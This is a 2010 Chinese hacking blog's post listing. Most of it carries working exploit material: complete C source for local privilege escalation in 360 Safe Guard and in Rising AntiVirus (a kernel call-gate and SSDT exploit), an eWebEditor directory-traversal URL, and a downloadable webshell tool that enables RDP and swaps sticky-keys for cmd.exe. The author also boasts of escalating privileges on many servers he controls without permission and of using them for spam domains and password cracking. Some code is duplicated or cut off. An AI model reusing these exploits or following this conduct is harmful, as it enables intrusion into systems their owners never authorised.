Author: 坏人咖啡

Real Name:

Profile:

Website:

Posts by 坏人咖啡

360安全卫士本地提权漏洞的webshell利用程序

08 2月 2010 | category

学习笔记,工具收集

Comments (2)

作者：oldjun

不知道该说什么好了，以前拿了很多shell，一直懒得提权，一是没那个必要，二是提权太累了，三是服务器类型的肉鸡多了也没啥用。不过要是能让我一下子就成功提权，何乐而不为呢？

于是360本地提权来了，最近已经沸沸扬扬的了，不多发表过多评论，只是觉得做公司更要厚道；本人菜另外还有很多兄弟在360，不说什么了，发了本地提权的利用程序吧。friddy那里已经有一份了，是用来替换5下shift为cmd.exe的360本地提权webshell下测试程序。

瑞星说是“bregdrv.sys和bregdll.dll”出的问题，然后http://www.sebug.net/exploit/19048/这个poc也是直接load这个dll的，于是这个利用程序也是基于这个的。webshell下使用，guest权限即可，需要Wscript.shell支持，功能主要是：

1.开启终端服务，端口为3389；用法：360.exe port

2.替换5下shift为cmd；用法：360.exe sethc

另外大家可以参考下包子的文章：360 0day漏洞及相关内幕，360很多dll存在类似的调用问题。据360的公告介绍已经打补丁了，具体是真是假，大家自己试试这个工具还能不能用吧。

这个工具不针对任何公司和个人，仅限爱好渗透的同学们进行交流。话说昨天从下午到晚上，我2、3年来拿到的仍然健在的shell的满足3389打开与安装了360安全卫士的服务器我都提了一下权，发现360在服务器的普及率也高的惊人，至少有80%，怪不得大家都提权提的爽死了，于是乎，很多肉鸡终于找到家了。

现在终于知道服务器类型的肉鸡的好处了，一是用来上线；二是用来摆放垃圾未备案域名；三是用来跑密码…看来之前轻视了。

演示：

(注：本图片只限学习，拒绝按此方法进行破坏或者瑞星公司拿此图片作为炒作)

下载：http://www.oldjun.com/download/360.exe

两个挺有意思的字符动画

04 2月 2010 | category

学习笔记,工具收集

Comments (1)

今天在网上看到一个很有意思的东西，于是就收集下来了，用字符播放动画！

这个是批处理版的，网页版的请点击 BadApple网页版

下载：Bad Apple批处理版

从最近360和瑞星的漏洞看到的东西有意思

04 2月 2010 | category

心情随笔

Comments (2)

先是在superhei的博客上看到的求横批的对联

上联：

下联：

hi群某牛的横批：金钱万能

下面的是从包子博客看到的

360做产品的还是有一定的安全意识的，看下他本地监听的端口就知道了，前端时间爆了瑞星的洞洞的ntinternals同学又捅出了360的两个0day，不过细节暂时未公布，有兴趣的同学请留意 http://www.ntinternals.org/advisory.php 虽然不少人骂360和瑞星是娱乐公司云云，但我不这么认为。因为信息安全的领空正逐渐成为企业之间较劲的战场，互联网行业是这样，传统行业也是这样。

静观360如何处理这次危机，瑞星对0day漏洞的处理貌似让ntinternals的同学不大满意，相信360会比瑞星做的更好。

#2010/2/2 11:31

瑞星已经在其官网发布360的漏洞细节及攻击代码，尚未确认其信息及攻击代码的真实性和有效性。理论上ntinternals应该不会把漏洞细节告知非360人士，我很好奇瑞星是如何得知相关细节及攻击代码的。如果是假的，那就是一个小忽悠，如果是真的，那么这里面故事应该就多了去了。

#######################################

#2010/2/2 11:43

传言360的bfsdrv.sys的漏洞早就被发现了并在某论坛发布。问题出在没验证API调用者的身份。

################

360″本地提权”漏洞后门利用程序 http://it.rising.com.cn/info/2010-02-02/6603.html

360安全卫士被曝“本地提权”漏洞数月未修复

http://it.rising.com.cn/info/2010-02-02/6601.html

瑞星说是“bregdrv.sys和bregdll.dll”出的问题。

#2010/2/2 17:19

360公开致谢NT Internals 已于第一时间修复漏洞

有意思有意思。

老外的一个免费的VPN

04 2月 2010 | category

学习笔记

Comments (1)

昨天啊斌要刷他的iphone结果发现刷机软件的网站被墙了，没办法只好找VPN了，貌似iphone中只能设置VPN代理，于是我就帮忙找了一下，搞了半天还真发现一个不错的东西anonymitynetwork，AnonymityNetwork免费VPN代理，有点类似USAIP，它在荷兰、英国、美国、爱尔兰、塞尔维亚等全球多个国家放置有VPN代理服务器节点，你可以任意选择，但每个邮箱帐户限制免费试用3小时，最多使用512MB的流量，同时AnonymityNetwork可以不用下载VPN软件，直接在操作系统中设置即可，更加方便更加安全。

整个注册过程也很简单，这里我做一个简单的教程方便那些不喜欢英文的同学。首先打开http://www.anonymitynetwork.com点右上角“SIGNUP FREE”

接着填写你的邮箱进行提交申请。

点击注册后这时你会在你的邮箱收到账号和密码,具体的内容如下“The following account has been successfully created: Email/Login: 这里是你的登录邮箱 Password: 这里是系统给你设置的密码 Thank you for using the …

发一个网摘网站的IE右键功能的源码

02 2月 2010 | category

学习笔记

Comments (4)

今天朋友让帮他搞一个IE右键菜单功能快捷入口，一开始研究了半天资料还意为很神奇呢，不过后来发现原来是这么的简单代码如下：

安装文件代码：


Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\坏人咖啡的窝]
@="http://huairen.me/rightClick.php"

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\坏人咖啡的窝]

@="http://huairen.me/rightClick.php"

将这段代码保存成huairen_install.reg

卸载代码：


Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\坏人咖啡的窝]

Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\坏人咖啡的窝]

保存成huairen_unstall.reg

接收文件代码：


&lt;html&gt;
&lt;script LANGUAGE="JavaScript"&gt;

if (external.menuArguments) {
var parentwin = external.menuArguments;
if (parentwin.document.selection) {
var sel = parentwin.document.selection.createRange().text;
}

if (!sel) {
var sel = '';
}

var url = parentwin.location.href;
var title = parentwin.document.title;

if (parentwin.event.srcElement.tagName == "A") {
url = parentwin.event.srcElement.getAttribute("HREF");
title = parentwin.event.srcElement.innerText;
}
window.clipboardData.clearData();
parentwin.document.execCommand("Copy");
void(window.open('http://huairen.me'))
} else {
history.go(-1);
}
&lt;/script&gt;
&lt;/html&gt;

<html>

if (external.menuArguments) {

var parentwin = external.menuArguments;

if (parentwin.document.selection) {

var sel = parentwin.document.selection.createRange().text;

}

if (!sel) {

var sel = '';

}

var url = parentwin.location.href;

var title = parentwin.document.title;

if (parentwin.event.srcElement.tagName == "A") {

url = parentwin.event.srcElement.getAttribute("HREF");

title = parentwin.event.srcElement.innerText;

}

window.clipboardData.clearData();

parentwin.document.execCommand("Copy");

void(window.open('http://huairen.me'))

} else {

history.go(-1);

}

</script>

</html>

将这段代码保存成rightClick.php，如果你的空间是ASP的那么就保存成rightClick.asp，自己根据情况改后缀吧！

然后将rightClick.php放到网站空间就OK了，记的一定要把其中的huairen.me换成你自己想要跳过去的网站！

源码我打包好了有需求的朋友可以下载下去看看

下载文件：huairen

eWebEditor遍历目录漏洞

02 2月 2010 | category

学习笔记,工具收集

已关闭评论

eWebEditor全版本通杀

利用方法：

http://site.com/admin/ewebeditor/admin/upload.asp?id=16&amp;d_viewmode=&amp;dir =./..

1	http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..

大家照着去换吧！

大家照着去换吧！

360安全卫士本地提权漏洞利用程序

02 2月 2010 | category

学习笔记,工具收集

已关闭评论

360看来也不是他说的那么安全嘛！

利用代码：

#include &lt;windows.h&gt;

typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

BREG_DELETE_KEY BRegDeleteKey = NULL;
BREG_OPEN_KEY BRegOpenKey = NULL;
BREG_CLOSE_KEY BRegCloseKey = NULL;
REG_SET_VALUE_EX BRegSetValueEx = NULL;

#define AppPath                        "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe"

#define TestDeleteKey             HKEY_LOCAL_MACHINE
#define TestDeleteRegPath    "Software\\360Safe\\Update"

#define TestSetKey                   HKEY_LOCAL_MACHINE
#define TestSetPath                  "Software\\360Safe"

BOOL InitBRegDll()
{
         LONG lResult;
         HKEY hKey;

         CHAR cPath[MAX_PATH + 32] = { 0 };
         DWORD dwPathLen = MAX_PATH;

         lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &amp;hKey);
         if (FAILED(lResult))
                  return FALSE;

         DWORD dwType = REG_SZ;
         lResult = RegQueryValueExA(hKey, "Path", NULL, &amp;dwType, (LPBYTE)cPath, &amp;dwPathLen);
         RegCloseKey(hKey);
         if (FAILED(lResult))
                  return FALSE;

         strcat(cPath, "\\deepscan\\BREGDLL.dll");

         HMODULE modBReg = LoadLibraryA(cPath);
         if (!modBReg)
                  return FALSE;

         INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");
         BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");
         BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");
         BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");
         BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");

         if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }

         if (!InitRegEngine()) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }

         return TRUE;
}

LONG TestSetRegKey()
{
         HKEY hKey;
         LONG lResult;

         lResult = BRegOpenKey(TestSetKey, TestSetPath, &amp;hKey);
         if (FAILED(lResult))
                  return lResult;

         DWORD dwType = REG_SZ;
         static char szData[] = "TEST VALUE";
         lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&amp;szData, (DWORD)sizeof(szData));
         BRegCloseKey(hKey);

         return lResult;
}

int main(int argc, char *argv[])
{
         if (!InitBRegDll()) {
                  MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);
                  return 1;

         }
         if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
                  MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);
                  return 2;

         }

         if (FAILED(TestSetRegKey())) {
                  MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);
                  return 3;
         }

         MessageBoxA(NULL, "突破系统安全检查，获得最高权限，漏洞利用成功!", "成功", MB_OK);
         return 0;
}

100

101

102

#include <windows.h>

typedef BOOL (WINAPI *INIT_REG_ENGINE)();

typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);

typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);

typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);

typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

BREG_DELETE_KEY BRegDeleteKey = NULL;

BREG_OPEN_KEY BRegOpenKey = NULL;

BREG_CLOSE_KEY BRegCloseKey = NULL;

REG_SET_VALUE_EX BRegSetValueEx = NULL;

#define AppPath "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe"

#define TestDeleteKey HKEY_LOCAL_MACHINE

#define TestDeleteRegPath "Software\\360Safe\\Update"

#define TestSetKey HKEY_LOCAL_MACHINE

#define TestSetPath "Software\\360Safe"

BOOL InitBRegDll()

{

LONG lResult;

HKEY hKey;

CHAR cPath[MAX_PATH + 32] = { 0 };

DWORD dwPathLen = MAX_PATH;

lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);

if (FAILED(lResult))

return FALSE;

DWORD dwType = REG_SZ;

lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);

RegCloseKey(hKey);

if (FAILED(lResult))

return FALSE;

strcat(cPath, "\\deepscan\\BREGDLL.dll");

HMODULE modBReg = LoadLibraryA(cPath);

if (!modBReg)

return FALSE;

INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");

BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");

BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");

BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");

BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");

if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {

FreeLibrary(modBReg);

return FALSE;

}

if (!InitRegEngine()) {

FreeLibrary(modBReg);

return FALSE;

}

return TRUE;

}

LONG TestSetRegKey()

{

HKEY hKey;

LONG lResult;

lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);

if (FAILED(lResult))

return lResult;

DWORD dwType = REG_SZ;

static char szData[] = "TEST VALUE";

lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));

BRegCloseKey(hKey);

return lResult;

}

int main(int argc, char *argv[])

{

if (!InitBRegDll()) {

MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);

return 1;

}

if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {

MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);

return 2;

}

if (FAILED(TestSetRegKey())) {

MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);

return 3;

}

MessageBoxA(NULL, "突破系统安全检查，获得最高权限，漏洞利用成功!", "成功", MB_OK);

return 0;

}

Rising AntiVirus 2008/2009/2010 本地权限提升漏洞

02 2月 2010 | category

学习笔记

已关闭评论

利用代码

by Dlrow   dlrow1991@ymail.com&lt;mailto:dlrow1991@ymail.com&gt;

restore all ssdt hooks

// Rising0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
enum { SystemModuleInformation = 11 };
typedef struct {
    ULONG   Unknown1;
    ULONG   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT  Index;
    USHORT  NameLength;
    USHORT  LoadCount;
    USHORT  PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
HANDLE g_RsGdiHandle = 0 ;
void __stdcall WriteKVM(PVOID Address , ULONG Value)
{
 ULONG ColorValue = Value ;
 ULONG btr ;
 ULONG ColorBuffer = 0 ;

 DeviceIoControl(g_RsGdiHandle ,
  0x83003C0B,
  &amp;ColorValue ,
  sizeof(ULONG),
  &amp;ColorBuffer ,
  sizeof(ULONG),
  &amp;btr ,
  0
  );
 DeviceIoControl(g_RsGdiHandle ,
  0x83003C0B,
  &amp;ColorValue ,
  sizeof(ULONG),
  Address ,
  sizeof(ULONG),
  &amp;btr ,
  0
  );
 return ;
}
void AddCallGate()
{
 ULONG Gdt_Addr;
 ULONG CallGateData[0x4];
 ULONG Icount;
 __asm
 {
  push edx
  sgdt [esp-2]
  pop edx
  mov Gdt_Addr , edx
 }
 __asm
 {

  push 0xc3
  push Gdt_Addr
  call WriteKVM
  mov eax,Gdt_Addr
  mov word ptr[CallGateData],ax
  shr eax,16
  mov word ptr[CallGateData+6],ax
  mov dword ptr[CallGateData+2],0x0ec0003e8
  mov dword ptr[CallGateData+8],0x0000ffff
  mov dword ptr[CallGateData+12],0x00cf9a00
  xor eax,eax
LoopWrite:
  mov edi,dword ptr CallGateData[eax]

  push edi
  mov edi,Gdt_Addr
  add edi,0x3e0
  add edi,eax
  push edi
  mov Icount,eax
  call WriteKVM
  mov eax,Icount
  add eax , 0x4
  cmp eax,0x10
  jnz LoopWrite
 }

 return ;
}

void IntoR0(PVOID function)
{
 WORD Callgt[3];
 Callgt[0] = 0;
 Callgt[1] = 0;
 Callgt[2] = 0x3e3;
 __asm
 {
  call fword ptr[Callgt]
  mov eax,esp
  mov esp,[esp+4]
  push eax
  call function
  pop esp
  push offset ring3Ret
  retf
ring3Ret:
  nop
 }
 return ;

}
#pragma pack(1)
typedef struct _IDTR
{
 SHORT  IDTLimit;
 UINT  IDTBase;
}IDTR,
 *PIDTR,
 **PPIDTR;
#pragma pack()
ULONG g_RealSSDT = 0 ;
ULONG ServiceNum = 0 ;
ULONG OrgService [0x1000] ;
ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)
{
 ULONG Offset = Rva, Limit;
 IMAGE_SECTION_HEADER *Img;
 WORD i;

 Img = IMAGE_FIRST_SECTION(NT);

 if (Rva &lt; Img-&gt;PointerToRawData)
  return Rva;

 for (i = 0; i &lt; NT-&gt;FileHeader.NumberOfSections; i++)
 {
  if (Img[i].SizeOfRawData)
   Limit = Img[i].SizeOfRawData;
  else
   Limit = Img[i].Misc.VirtualSize;

  if (Rva &gt;= Img[i].VirtualAddress &amp;&amp;
   Rva &lt; (Img[i].VirtualAddress + Limit))
  {
   if (Img[i].PointerToRawData != 0)
   {
    Offset -= Img[i].VirtualAddress;
    Offset += Img[i].PointerToRawData;
   }

   return Offset;
  }
 }

 return 0;
}
#define ibaseDD *(PDWORD)&amp;ibase
DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)
{
    PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;
    if ((mzhead-&gt;e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead-&gt;e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;
    *pfh=(PIMAGE_FILE_HEADER)&amp;ibase[mzhead-&gt;e_lfanew];
    if (((PIMAGE_NT_HEADERS)*pfh)-&gt;Signature!=IMAGE_NT_SIGNATURE) return FALSE;
    *pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));
    *poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));
    if ((*poh)-&gt;Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;
    *psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));
    return TRUE;
}
typedef struct {
    WORD    offset:12;
    WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))
DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)
{
    PIMAGE_FILE_HEADER    pfh;
    PIMAGE_OPTIONAL_HEADER    poh;
    PIMAGE_SECTION_HEADER    psh;
    PIMAGE_BASE_RELOCATION    pbr;
    PIMAGE_FIXUP_ENTRY    pfe;

    DWORD    dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;
    BOOL    bFirstChunk;

    GetHeaders((PCHAR)hModule,&amp;pfh,&amp;poh,&amp;psh);

    if ((poh-&gt;DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &amp;&amp;
        (!((pfh-&gt;Characteristics)&amp;IMAGE_FILE_RELOCS_STRIPPED))) {

        pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh-&gt;DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);
        bFirstChunk=TRUE;
        while (bFirstChunk || pbr-&gt;VirtualAddress) {
            bFirstChunk=FALSE;

            pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

            for (i=0;i&lt;(pbr-&gt;SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))&gt;&gt;1;i++,pfe++) {
                if (pfe-&gt;type==IMAGE_REL_BASED_HIGHLOW) {
                    dwFixups++;
                    dwPointerRva=pbr-&gt;VirtualAddress+pfe-&gt;offset;
                    dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh-&gt;ImageBase;

                    if (dwPointsToRva==dwKSDT)
     {
                        if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)
      {
                            dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh-&gt;ImageBase;
       *ImageBase = poh-&gt;ImageBase;
                            return dwKiServiceTable;
                        }
                    }

                }
            }
            *(PDWORD)&amp;pbr+=pbr-&gt;SizeOfBlock;
        }
    }

    return 0;
}
DWORD CR0Reg ;
ULONG realssdt ;
void InKerneProc()
{
 __asm
 {
  cli
  mov eax, cr0
  mov CR0Reg,eax
  and eax,0xFFFEFFFF
  mov cr0, eax
 }
 int i;
 for (i = 0; i &lt; (int)ServiceNum; i++)
 {
  *(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService[i];
 }
 __asm
 {
  mov eax, CR0Reg
  mov cr0, eax
  sti
 }

}
int main(int argc, char* argv[])
{
 printf("Rising AntiVirus 2008 ~ 2010 \n"
  "Local Privilege Escalation Vulnerability Proof Of Concept Exploit\n 2010-1-27\n");

     g_RsGdiHandle = CreateFile("\\\\.\\RSNTGDI" ,
  0,
  FILE_SHARE_READ | FILE_SHARE_WRITE ,
  0,
  OPEN_EXISTING , 0 , 0 );
 if (g_RsGdiHandle == INVALID_HANDLE_VALUE)
 {
  return 0 ;
 }

 SYSTEM_MODULE_INFORMATION ModuleInfo ;

 // Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

 HMODULE hlib = GetModuleHandle("ntdll.dll");
 PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");
 ULONG infosize = sizeof(ModuleInfo);

 __asm
 {
  push 0
  push infosize
  lea eax , ModuleInfo
  push eax
  push 11
  call pNtQuerySystemInformation
 }

 HMODULE KernelHandle ;
 LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

    // Load the kernel image specified
 KernelHandle = LoadLibrary(ntosname);
 if (KernelHandle == 0 )
 {
  return 0 ;
 }

 ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

 if (KeSSDT == 0 )
 {
  return 0 ;
 }
 ULONG ImageBase = 0 ;
 ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &amp;ImageBase);
 if (KiSSDT == 0 )
 {
  return 0 ;
 }
 KiSSDT += (ULONG)KernelHandle;
 ServiceNum = 0x11c ;
 ULONG i ;

 for (i = 0 ; i &lt; ServiceNum ; i ++)
 {
  OrgService[i] = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;
 }

 realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

 SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

 AddCallGate();
 IntoR0(InKerneProc);
 return 0;
}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

by Dlrow dlrow1991@ymail.com<mailto:dlrow1991@ymail.com>

restore all ssdt hooks

// Rising0day.cpp : Defines the entry point for the console application.

#include "stdafx.h"

#include "windows.h"

enum { SystemModuleInformation = 11 };

typedef struct {

ULONG Unknown1;

ULONG Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORT Index;

USHORT NameLength;

USHORT LoadCount;

USHORT PathLength;

CHAR ImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0 ;

void __stdcall WriteKVM(PVOID Address , ULONG Value)

{

ULONG ColorValue = Value ;

ULONG btr ;

ULONG ColorBuffer = 0 ;

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

&ColorBuffer ,

sizeof(ULONG),

&btr ,

);

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

Address ,

sizeof(ULONG),

&btr ,

);

return ;

}

void AddCallGate()

{

ULONG Gdt_Addr;

ULONG CallGateData[0x4];

ULONG Icount;

__asm

{

push edx

sgdt [esp-2]

pop edx

mov Gdt_Addr , edx

}

__asm

{

push 0xc3

push Gdt_Addr

call WriteKVM

mov eax,Gdt_Addr

mov word ptr[CallGateData],ax

shr eax,16

mov word ptr[CallGateData+6],ax

mov dword ptr[CallGateData+2],0x0ec0003e8

mov dword ptr[CallGateData+8],0x0000ffff

mov dword ptr[CallGateData+12],0x00cf9a00

xor eax,eax

LoopWrite:

mov edi,dword ptr CallGateData[eax]

push edi

mov edi,Gdt_Addr

add edi,0x3e0

add edi,eax

push edi

mov Icount,eax

call WriteKVM

mov eax,Icount

add eax , 0x4

cmp eax,0x10

jnz LoopWrite

}

return ;

}

void IntoR0(PVOID function)

{

WORD Callgt[3];

Callgt[0] = 0;

Callgt[1] = 0;

Callgt[2] = 0x3e3;

__asm

{

call fword ptr[Callgt]

mov eax,esp

mov esp,[esp+4]

push eax

call function

pop esp

push offset ring3Ret

retf

ring3Ret:

nop

}

return ;

}

#pragma pack(1)

typedef struct _IDTR

{

SHORT IDTLimit;

UINT IDTBase;

}IDTR,

*PIDTR,

**PPIDTR;

#pragma pack()

ULONG g_RealSSDT = 0 ;

ULONG ServiceNum = 0 ;

ULONG OrgService [0x1000] ;

ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)

{

ULONG Offset = Rva, Limit;

IMAGE_SECTION_HEADER *Img;

WORD i;

Img = IMAGE_FIRST_SECTION(NT);

if (Rva < Img->PointerToRawData)

return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)

{

if (Img[i].SizeOfRawData)

Limit = Img[i].SizeOfRawData;

else

Limit = Img[i].Misc.VirtualSize;

if (Rva >= Img[i].VirtualAddress &&

Rva < (Img[i].VirtualAddress + Limit))

{

if (Img[i].PointerToRawData != 0)

{

Offset -= Img[i].VirtualAddress;

Offset += Img[i].PointerToRawData;

}

return Offset;

}

return 0;

}

#define ibaseDD *(PDWORD)&ibase

DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)

{

PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;

if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];

if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));

*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));

if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;

*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));

return TRUE;

}

typedef struct {

WORD offset:12;

WORD type:4;

} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)

{

PIMAGE_FILE_HEADER pfh;

PIMAGE_OPTIONAL_HEADER poh;

PIMAGE_SECTION_HEADER psh;

PIMAGE_BASE_RELOCATION pbr;

PIMAGE_FIXUP_ENTRY pfe;

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;

BOOL bFirstChunk;

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&

